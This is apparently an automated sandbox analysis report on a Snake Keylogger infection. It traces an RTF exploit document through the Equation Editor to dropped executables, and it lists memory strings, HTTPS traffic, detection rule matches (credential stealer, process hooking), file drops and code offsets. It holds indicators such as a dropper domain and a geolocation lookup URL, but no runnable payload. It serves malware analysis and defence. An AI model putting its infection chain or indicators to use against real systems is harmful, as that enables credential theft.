Source: swagodi78811.scr, 00000014.00000002.663684485.0000000002540000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002595000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002586000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000024DB000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000255E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000254E000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.000000000252B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002493000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002482000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000243E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002457000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000242C000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002449000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000024A1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000023DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.334
Source: swagodi78811.scr, 00000014.00000002.663684485.0000000002683000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002670000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000025D2000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.000000000336B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000033B7000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002591000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000257E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000025BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: swagodi78811.scr, 00000014.00000002.663684485.0000000002683000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.0000000002670000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000026C4000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663684485.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000025D2000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.000000000336B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000033B7000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.0000000002591000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.000000000257E000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663663825.00000000025BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: EQNEDT32.EXE, 00000009.00000002.392933618.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.392933618.000000000054F000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.663426332.000000000079D000.00000004.00000020.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.663315507.000000000077C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: EQNEDT32.EXE, 00000009.00000002.393794677.00000000042B0000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.392933618.000000000054F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000009.00000002.392933618.00000000005DF000.00000004.00000020.00020000.00000000.sdmp, swagodi78811.scr.9.dr, gRpkBp.exe.10.dr, swagodi[1].scr.9.dr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: gRpkBp.exe, 0000001D.00000002.663663825.00000000025BF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/favicon.ico
Source: gRpkBp.exe, 0000001D.00000002.664487526.0000000003453000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000034F6000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000034CF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=net
Source: gRpkBp.exe, 0000001D.00000002.664487526.00000000034CF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&i
Source: gRpkBp.exe, 0000001D.00000002.664487526.0000000003468000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=wmf
Source: gRpkBp.exe, 0000001D.00000002.663663825.00000000025D2000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000034C2000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.0000000003468000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/sorry/index
Source: gRpkBp.exe, 0000001D.00000002.664487526.0000000003453000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000034CF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26a
Source: gRpkBp.exe, 0000001D.00000002.664487526.0000000003453000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000034CF000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000034C2000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.0000000003468000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmf
Source: swagodi78811.scr, 00000014.00000002.664602794.0000000003607000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.664602794.000000000351B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000034AC000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000033F8000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.0000000003453000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000034CF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/sorry/indextest

Source: unknown	Network traffic detected: HTTP traffic on port 49162 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49189
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49188
Source: unknown	Network traffic detected: HTTP traffic on port 49181 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49186
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49183
Source: unknown	Network traffic detected: HTTP traffic on port 49189 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49200 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49181
Source: unknown	Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49166 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49179
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49178
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49175
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown	Network traffic detected: HTTP traffic on port 49188 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49203 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49198 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49194 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49203
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49202
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49200
Source: unknown	Network traffic detected: HTTP traffic on port 49183 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown	Network traffic detected: HTTP traffic on port 49164 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49164
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49163
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49162
Source: unknown	Network traffic detected: HTTP traffic on port 49202 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49161
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49193 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49178 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49161 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49186 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49198
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49196
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49194
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49193
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49192
Source: unknown	Network traffic detected: HTTP traffic on port 49196 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49175 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49192 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49179 -> 443

Source: unknown	HTTPS traffic detected: 104.21.52.88:443 -> 192.168.2.22:49161 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.52.88:443 -> 192.168.2.22:49168 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49194 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49203 version: TLS 1.2

System Summary

Source: 10.2.swagodi78811.scr.316cb90.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.swagodi78811.scr.316cb90.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.swagodi78811.scr.316cb90.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 20.2.swagodi78811.scr.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 20.2.swagodi78811.scr.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 20.2.swagodi78811.scr.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.swagodi78811.scr.3129570.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.swagodi78811.scr.3129570.6.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.swagodi78811.scr.3129570.6.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.swagodi78811.scr.316cb90.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.swagodi78811.scr.316cb90.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.swagodi78811.scr.316cb90.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.swagodi78811.scr.3129570.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.swagodi78811.scr.3129570.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.swagodi78811.scr.3129570.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: swagodi78811.scr PID: 3468, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: swagodi78811.scr PID: 3880, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9F4A4ED3.doc, type: DROPPED	Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\swagodi[1].doc, type: DROPPED	Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\swagodi.doc.url			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\meridianresourcellc.top.url			Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\swagodi78811.scr			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\swagodi[1].scr			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 770B0000 page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Memory allocated: 770B0000 page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Memory allocated: 770B0000 page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Memory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\gRpkBp.exe	Memory allocated: 770B0000 page execute and read and write

Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 10_2_002804D8		10_2_002804D8
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 10_2_00289AB0		10_2_00289AB0
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 10_2_0028D000		10_2_0028D000
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 10_2_0028D4E8		10_2_0028D4E8
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 10_2_0028C774		10_2_0028C774
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 10_2_0028C790		10_2_0028C790
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 10_2_0028CBC8		10_2_0028CBC8
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 10_2_0028DE90		10_2_0028DE90
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_0020392D		20_2_0020392D
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_002031B1		20_2_002031B1
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_0020E190		20_2_0020E190
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_002069F0		20_2_002069F0
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_00204A9F		20_2_00204A9F
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_00209300		20_2_00209300
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_00208C20		20_2_00208C20
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_00203483		20_2_00203483
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_002044F0		20_2_002044F0
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_002074C8		20_2_002074C8
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_00204D6F		20_2_00204D6F
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_00208544		20_2_00208544
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_00203E28		20_2_00203E28
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_00205E70		20_2_00205E70
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_00209E88		20_2_00209E88
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_002047D0		20_2_002047D0
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_0020E830		20_2_0020E830
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_0020E180		20_2_0020E180
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_0020F181		20_2_0020F181
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_0020D9F9		20_2_0020D9F9
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_0020DA08		20_2_0020DA08
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_0020FAB1		20_2_0020FAB1
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_0020ECE8		20_2_0020ECE8
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_0020F619		20_2_0020F619
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_0067F078		20_2_0067F078
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_006712A0		20_2_006712A0
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_00678748		20_2_00678748
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_0067F067		20_2_0067F067
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_00672068		20_2_00672068
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_00676068		20_2_00676068
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_00676078		20_2_00676078
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_00670040		20_2_00670040
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_00674040		20_2_00674040
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_00674050		20_2_00674050
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_00677C08		20_2_00677C08
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_00678C10		20_2_00678C10
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_006744E8		20_2_006744E8
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_0067A8C0		20_2_0067A8C0
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_006790CA		20_2_006790CA
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_006704D8		20_2_006704D8
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_006790D8		20_2_006790D8
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_006744D8		20_2_006744D8
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_006780A0		20_2_006780A0
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_0067C0A8		20_2_0067C0A8
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_0067A8B0		20_2_0067A8B0
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_0067D880		20_2_0067D880
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_0067D890		20_2_0067D890
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_00678090		20_2_00678090
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_0067AD77		20_2_0067AD77
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_00670970		20_2_00670970
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_0067C570		20_2_0067C570
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_00674970		20_2_00674970
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_0067F540		20_2_0067F540
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_0067DD48		20_2_0067DD48
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_0067DD58		20_2_0067DD58
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_00676502		20_2_00676502
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_00672500		20_2_00672500
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_00676510		20_2_00676510
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_0067F9F7		20_2_0067F9F7
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_006795A0		20_2_006795A0
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_006769A8		20_2_006769A8
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_00674980		20_2_00674980
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_0067958F		20_2_0067958F
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_0067AD88		20_2_0067AD88
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_0067699A		20_2_0067699A
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_00672998		20_2_00672998
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_00679A68		20_2_00679A68
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_00676E40		20_2_00676E40
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_0067B240		20_2_0067B240
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_0067B250		20_2_0067B250
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_00679A58		20_2_00679A58
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_0067E220		20_2_0067E220
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_0067CA32		20_2_0067CA32
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_00672E30		20_2_00672E30
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_00676E30		20_2_00676E30
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_0067CA38		20_2_0067CA38
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_00670E08		20_2_00670E08
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_0067FA08		20_2_0067FA08
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_00674E08		20_2_00674E08
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_0067E211		20_2_0067E211
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_00674E18		20_2_00674E18
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_0067E6E8		20_2_0067E6E8
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_006732C8		20_2_006732C8
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_006772C8		20_2_006772C8
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_0067E6DE		20_2_0067E6DE
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_006772D8		20_2_006772D8
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_006752A0		20_2_006752A0
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_006752B0		20_2_006752B0
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_006732BA		20_2_006732BA
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_00671291		20_2_00671291
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_00677761		20_2_00677761
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_00673760		20_2_00673760
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_00677770		20_2_00677770
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_00675748		20_2_00675748
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_00673750		20_2_00673750
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_00679F26		20_2_00679F26
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_00679F30		20_2_00679F30
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_00678739		20_2_00678739
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_00671738		20_2_00671738
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_00675738		20_2_00675738
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_0067B707		20_2_0067B707
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_0067CF00		20_2_0067CF00
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_0067B718		20_2_0067B718
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_00675BE0		20_2_00675BE0
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_0067BBE0		20_2_0067BBE0
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_00673BE9		20_2_00673BE9
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_0067A3E8		20_2_0067A3E8
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_00678BFF		20_2_00678BFF
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_00673BF8		20_2_00673BF8
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_0067A3F8		20_2_0067A3F8
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_00677BF8		20_2_00677BF8
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_00671BC1		20_2_00671BC1
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_0067D3C8		20_2_0067D3C8
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_00675BD1		20_2_00675BD1
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_00671BD0		20_2_00671BD0
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_0067EBA1		20_2_0067EBA1
Source: C:\Users\user\AppData\Roaming\swagodi78811.scr	Code function: 20_2_0067EBB0		20_2_0067EBB0
